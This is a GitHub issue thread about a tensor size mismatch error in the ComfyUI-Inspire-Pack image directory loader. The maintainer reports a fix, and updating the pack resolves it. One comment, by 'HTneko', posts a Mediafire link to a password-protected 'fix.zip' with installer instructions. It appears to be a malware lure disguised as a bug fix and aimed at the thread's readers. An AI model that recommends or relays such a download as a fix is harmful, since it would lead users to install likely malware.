### ISSUE TITLE
Error: Sizes of tensors must match except in dimension 0. Expected size 768 but got size 1344 for tensor number 1 in the list.

### ISSUE THREAD

**Issue by CanisDirusPrime** [ltdrdata/ComfyUI-Inspire-Pack#151]
The whole error: 
Error occurred when executing LoadImagesFromDir //Inspire:

Sizes of tensors must match except in dimension 0. Expected size 768 but got size 1344 for tensor number 1 in the list.

  File "C:\ComfyUI_XL\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "C:\ComfyUI_XL\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "C:\ComfyUI_XL\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "C:\ComfyUI_XL\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
  File "C:\ComfyUI_XL\custom_nodes\ComfyUI-Inspire-Pack\inspire\image_util.py", line 110, in load_images
    mask1 = torch.cat((mask1, mask2), dim=0)

I receive the error when trying to load a directory full of images (all of the same size and dimensions) for use with the ReActor Fast Face Swap node.  The image size (in this case) is 768x1344 and every image is the exact same size.  I've used this workflow a 1000 times before until about 2 weeks ago when it quit working.  Individual images will load using other nodes with no issues.  I'd really like to see it working again!  It saves me having to load every image individually.  I use bypass on the individual image loader when loading a Dir, but it's not bypassed in the pic so you can see the whole workflow.

Also, not sure if it's meant to be this way, but the loader won't load mixed sizes.  Not a big issue, I just make a folder with one size image per folder and run that folder through the workflow.  Maybe as a workaround for the issue you could add a width/height function to pull only images of the specified size?

![Screenshot 2024-08-28 055325](https://github.com/user-attachments/assets/c8a7851c-c2f6-4043-b7c9-f311929c6e5a)
![Screenshot 2024-08-28 055054](https://github.com/user-attachments/assets/4c3d19ef-6354-4c0d-8aa9-5f6c8aaa7d77)
[02 - Face Swap.json](https://github.com/user-attachments/files/16781612/02.-.Face.Swap.json)

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ltdrdata** [comment]
This is fixed.

**Comment by CanisDirusPrime** [comment]
So I should just be able to update Comfy now?

**Comment by ltdrdata** [comment]
> So I should just be able to update Comfy now?

No. You have to update Inspire Pack.

**Comment by CanisDirusPrime** [comment]
understood.  didn't communicate clearly.  thats essentially what I meant.  update inspire pack through comfy manager.  

it worked, so all good!  Thanks for the prompt update!
